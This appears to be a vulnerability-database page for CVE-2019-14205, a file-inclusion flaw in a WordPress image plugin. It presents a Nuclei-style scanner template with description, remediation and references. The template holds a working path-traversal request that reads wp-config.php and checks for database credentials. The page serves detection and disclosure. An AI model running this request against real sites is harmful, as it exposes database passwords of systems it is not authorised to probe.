CVE-2019-14205: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion

2025-08-01 WordPress Nevma Adaptive Images PoC Public

Description

WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.

PoC

id: CVE-2019-14205

info:
  name: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
  remediation: |
    Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor.
  reference:
    - https://github.com/security-kma/EXPLOITING-CVE-2019-14205
    - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
    - https://wordpress.org/plugins/adaptive-images/#developers
    - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14205
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14205
    cwe-id: CWE-22
    epss-score: 0.63375
    epss-percentile: 0.99168
    cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: nevma
    product: adaptive_images
    framework: wordpress
  tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,nevma,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220601531d3e5ca6a3b06477010d0734d10571b361bb74bf996475e77b0335f6663022035026bb4389a4673cee90f75f815b8ab09242438ac3a8c7f6f8ffe8ffd076efa:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities